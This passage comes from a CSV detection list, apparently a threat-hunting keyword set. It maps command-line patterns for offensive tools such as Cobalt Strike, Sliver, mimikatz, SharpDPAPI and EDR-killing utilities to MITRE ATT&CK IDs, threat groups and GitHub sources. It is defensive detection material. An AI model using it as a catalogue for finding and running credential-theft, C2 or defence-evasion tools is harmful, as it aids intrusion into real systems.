These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "* beacon_win_default*",".{0,1000}\sbeacon_win_default.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* --beacon=*",".{0,1000}\s\-\-beacon\=.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - 
T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","0","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "* beacon64.bin *",".{0,1000}\sbeacon64\.bin\s.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","0","N/A","10","10","845","147","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "* Benjamin DELPY *",".{0,1000}\sBenjamin\sDELPY\s.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "* beRoot.exe*",".{0,1000}\sbeRoot\.exe.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / 
Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "* beRoot.py*",".{0,1000}\sbeRoot\.py.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "* bettercap*",".{0,1000}\sbettercap.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "* --bf-hashes-file *",".{0,1000}\s\-\-bf\-hashes\-file\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "* --bf-passwords-file *",".{0,1000}\s\-\-bf\-passwords\-file\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "* --bhdump 
*",".{0,1000}\s\-\-bhdump\s.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "* bhqc.py -*",".{0,1000}\sbhqc\.py\s\-.{0,1000}","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/kaluche/bloodhound-quickwin","1","0","AD Enumeration","6","2","185","19","2023-12-18T13:23:10Z","2021-02-16T16:04:16Z" "* bin2mac.py*",".{0,1000}\sbin2mac\.py.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "* -bindPipe * -destHost * -destPort *",".{0,1000}\s\-bindPipe\s.{0,1000}\s\-destHost\s.{0,1000}\s\-destPort\s.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","293","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "* bitcoin-getaddr.nse*",".{0,1000}\sbitcoin\-getaddr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* bitcoin-info.nse*",".{0,1000}\sbitcoin\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* bitcoinrpc-info.nse*",".{0,1000}\sbitcoinrpc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* bittorrent-discovery.nse*",".{0,1000}\sbittorrent\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* bjnp-discover.nse*",".{0,1000}\sbjnp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Blackout.cpp*",".{0,1000}\sBlackout\.cpp.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "* Blackout.sln*",".{0,1000}\sBlackout\.sln.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "* Blackout.sys*",".{0,1000}\sBlackout\.sys.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "* bleeding-jumbo john*",".{0,1000}\sbleeding\-jumbo\sjohn.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* blindeventlog.exe*",".{0,1000}\sblindeventlog\.exe.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) 
mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "* blob /target:*.bin* /pvk:*",".{0,1000}\sblob\s\/target\:.{0,1000}\.bin.{0,1000}\s\/pvk\:.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "* blob /target:*.bin* /unprotect*",".{0,1000}\sblob\s\/target\:.{0,1000}\.bin.{0,1000}\s\/unprotect.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "* block_dll_policy.exe*",".{0,1000}\sblock_dll_policy\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* --blockDLLs --ruy-lopez*",".{0,1000}\s\-\-blockDLLs\s\-\-ruy\-lopez.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral 
Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","1","N/A","N/A","N/A","N/A" "* --bloodhound --ns ip --collection All*",".{0,1000}\s\-\-bloodhound\s\-\-ns\sip\s\-\-collection\sAll.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* bof_allocator *",".{0,1000}\sbof_allocator\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "* 
bof_reg_collect_parser.py*",".{0,1000}\sbof_reg_collect_parser\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* bof_reuse_memory *",".{0,1000}\sbof_reuse_memory\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1476","287","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z" "* -BOFBytes *",".{0,1000}\s\-BOFBytes\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","10","10","244","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "* BOFNET *",".{0,1000}\sBOFNET\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "* BofRunner(*",".{0,1000}\sBofRunner\(.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "* -bootkey *",".{0,1000}\s\-bootkey\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* Brc4LdapSentinelParser*",".{0,1000}\sBrc4LdapSentinelParser.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "* broadcast-ataoe-discover.nse*",".{0,1000}\sbroadcast\-ataoe\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-avahi-dos.nse*",".{0,1000}\sbroadcast\-avahi\-dos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-bjnp-discover.nse*",".{0,1000}\sbroadcast\-bjnp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-db2-discover.nse*",".{0,1000}\sbroadcast\-db2\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-dhcp6-discover.nse*",".{0,1000}\sbroadcast\-dhcp6\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-dhcp-discover.nse*",".{0,1000}\sbroadcast\-dhcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-dns-service-discovery.nse*",".{0,1000}\sbroadcast\-dns\-service\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-dropbox-listener.nse*",".{0,1000}\sbroadcast\-dropbox\-listener\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-eigrp-discovery.nse*",".{0,1000}\sbroadcast\-eigrp\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-hid-discoveryd.nse*",".{0,1000}\sbroadcast\-hid\-discoveryd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* 